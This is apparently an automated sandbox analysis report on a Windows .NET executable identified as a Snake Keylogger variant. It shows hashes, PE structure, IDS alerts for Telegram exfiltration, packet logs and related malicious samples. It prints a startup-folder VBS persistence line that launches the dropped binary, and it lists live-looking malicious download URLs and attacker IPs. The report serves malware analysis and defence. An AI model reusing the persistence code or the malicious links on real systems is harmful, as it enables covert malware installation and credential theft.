                                                                    Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 188.114.97.3
                                                                    dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0NGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    MUM - VESSEL'S PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=Get hashmaliciousScreenConnect ToolBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    FW Complete with Docusign Remittance Advice .pdf.emlGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    https://gthr.uk/e8c3Get hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 149.154.167.220
                                                                    • 190.107.177.80

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Roaming\IsInvalid.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Ndnownts.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):54272
                                                                    Entropy (8bit):5.594615265744183
                                                                    Encrypted:false
                                                                    SSDEEP:768:oO8d/uNf0FME+RGoOfHvtkVCWDwIXSqi935jSsNPKzTKWV1YaojgQug1/nJpVI6C:Yg9vZy1/JI6WLLoHT0ti9hge+
                                                                    MD5:297E05EE6CE9A0E345F5053D87AC7401
                                                                    SHA1:3AAF227B2A441D16477F2DB50B35C03711F1C583
                                                                    SHA-256:188D3957239F757531A5783322EAA577CEF632C4BDE8ACC6B82EE166C79D4CC8
                                                                    SHA-512:FF9F8B58992E3C09E0E72889A5793B0C50C806D1F2FCA4AFCD1125E6A9D65E0270C90B6C58D04814413EB660609B14248488E0D949ED0B0C824BDE476C3229E0
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 46%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................z.... ........@.. .......................@............`.................................0...J............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H.......xz...n..........................................................>+......*s....+...(....*v+.+.r...p+.*.+.o....+.(....+....0..k.......~....%-.&~..........s....%.....+.~....%-.&~..........s....%.....+.+.+.+.+.+.+.*.+..+..+..+..+..+..+.(....+...0..c........,.+>+C+D+E}.....-..,.+;+<}....+9+:+;.......s ..........s!...(....*s....+..+..+..+..+...+..+..+..+...0..M.......~....%-.&~..........s....%.....+.+.+.+.+.+.+.+.*.+..+..+..+..+...+..+.(....+.....0..\.......+:+?+@+A}....+=+

                                                                    C:\Users\user\AppData\Roaming\IsInvalid.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Ndnownts.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Ndnownts.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):84
                                                                    Entropy (8bit):4.8090588696872025
                                                                    Encrypted:false
                                                                    SSDEEP:3:FER/n0eFHHot+kiEaKC56I9dinn:FER/lFHIwknaZ56I9dO
                                                                    MD5:3A26E7B446D485AC8A85F2025A17B65F
                                                                    SHA1:047BC16598AB57B1B96CB6DD23BAE9E1F9666FA9
                                                                    SHA-256:D14DFAEB57F81F5AAAE6C3EE1D62B81A1BC64C4FD5B057EC1F24E26D56C7BB84
                                                                    SHA-512:A3F2A21C4CD9866713F9C525EB95D33D24E20F535924F0B6E25A2514A75C6757C495B3D628EF4C51784AF1BF44DF983D31FB87E91A302FFA2882EE06122B8C7C
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsInvalid.exe"""

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.594615265744183
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:Ndnownts.exe
                                                                    File size:54'272 bytes
                                                                    MD5:297e05ee6ce9a0e345f5053d87ac7401
                                                                    SHA1:3aaf227b2a441d16477f2db50b35c03711f1c583
                                                                    SHA256:188d3957239f757531a5783322eaa577cef632c4bde8acc6b82ee166c79d4cc8
                                                                    SHA512:ff9f8b58992e3c09e0e72889a5793b0c50c806d1f2fca4afcd1125e6a9d65e0270c90b6c58d04814413eb660609b14248488e0d949ed0b0c824bde476c3229e0
                                                                    SSDEEP:768:oO8d/uNf0FME+RGoOfHvtkVCWDwIXSqi935jSsNPKzTKWV1YaojgQug1/nJpVI6C:Yg9vZy1/JI6WLLoHT0ti9hge+
                                                                    TLSH:1A33194993E93B13D5CA0B7EA9B5A1814B70D1B1DF36D32F608D6AB94A1BBE20402753
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................z.... ........@.. .......................@............`................................

                                                                    File Icon

                                                                    Icon Hash:90cececece8e8eb0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40e97a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x671FAEB4 [Mon Oct 28 15:33:08 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe9300x4a.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x59e.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xc9800xca00b57996bfc56e15dfde988b66f0d1f047False0.4176400061881188data5.666637758567898IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x100000x59e0x6002b5abe19ff9a059f1bda724c09d4fe1eFalse0.421875data4.072430998028755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x120000xc0x200d8ffe3e652100c7d3e0b7785e3c8d401False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x1005c0x31cdata0.4271356783919598
                                                                    RT_MANIFEST0x103b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-10-30T01:42:07.252327+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731193.122.130.080TCP
                                                                    2024-10-30T01:42:08.502333+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731193.122.130.080TCP
                                                                    2024-10-30T01:42:09.210148+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449733188.114.97.3443TCP
                                                                    2024-10-30T01:42:09.939824+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734193.122.130.080TCP
                                                                    2024-10-30T01:42:10.658395+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449735188.114.97.3443TCP
                                                                    2024-10-30T01:42:13.555753+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449739188.114.97.3443TCP
                                                                    2024-10-30T01:42:16.546534+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449743188.114.97.3443TCP
                                                                    2024-10-30T01:42:24.767893+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449753149.154.167.220443TCP
                                                                    2024-10-30T01:42:25.533575+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449754193.122.130.080TCP
                                                                    2024-10-30T01:42:26.643064+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449754193.122.130.080TCP
                                                                    2024-10-30T01:42:27.376615+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449756188.114.97.3443TCP
                                                                    2024-10-30T01:42:28.096136+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449757193.122.130.080TCP
                                                                    2024-10-30T01:42:31.725216+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449762188.114.97.3443TCP
                                                                    2024-10-30T01:42:42.464497+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449769149.154.167.220443TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 30, 2024 01:42:00.298937082 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:00.299031973 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:00.299139023 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:00.336689949 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:00.336734056 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.193610907 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.193722963 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.197611094 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.197638035 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.197863102 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.245220900 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.287331104 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.493732929 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.493752003 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.493758917 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.493844986 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.493887901 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.549173117 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.617263079 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.617273092 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.617306948 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.617331982 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.617367983 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.656616926 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.656624079 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.656692028 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.734989882 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.734997034 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.735147953 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.774739027 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.774745941 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.774830103 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.851633072 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.851640940 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.851728916 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.890764952 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.890772104 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.890861988 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:01.968657017 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:01.968811035 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.007960081 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.008121014 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.085834980 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.085932970 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.124936104 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.125016928 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.202507973 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.202608109 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.241691113 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.241786957 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.319343090 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.319442987 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.358417988 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.358535051 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.385436058 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.385526896 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.436949968 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.437155962 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.475784063 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.475893021 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.553280115 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.553359985 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.592653036 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.592746019 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.661756992 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.661941051 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.670836926 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.670905113 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.709847927 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.709949970 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.778846979 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.778944969 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.788002014 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.788081884 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.853534937 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.853627920 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.895802975 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.895910025 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.905083895 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.905205011 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:02.970575094 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:02.970777035 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.021466970 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.021644115 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.022160053 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.022229910 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.060858011 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.060962915 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.129873037 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.129951000 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.138802052 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.138900995 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.178117037 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.178185940 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.205010891 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.205200911 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.256150961 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.256228924 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.302814007 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.302896023 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.321453094 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.321590900 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.364624023 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.364732981 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.373447895 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.373527050 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.420286894 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.420388937 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.438621044 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.438817978 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.489664078 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.489757061 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.536736965 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.536850929 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.537271023 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.537339926 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.555803061 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.555896997 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.606997013 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.607109070 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.653692007 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.653795004 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.655018091 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.655122995 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.672648907 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.672741890 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.727444887 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.727564096 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.770629883 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.770730972 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.771779060 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.771856070 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.789578915 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.789654970 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.842343092 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.842412949 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.887644053 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.887733936 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.888595104 CET44349730190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:03.888675928 CET49730443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:03.889452934 CET44349730190.107.177.80192.168.2.4
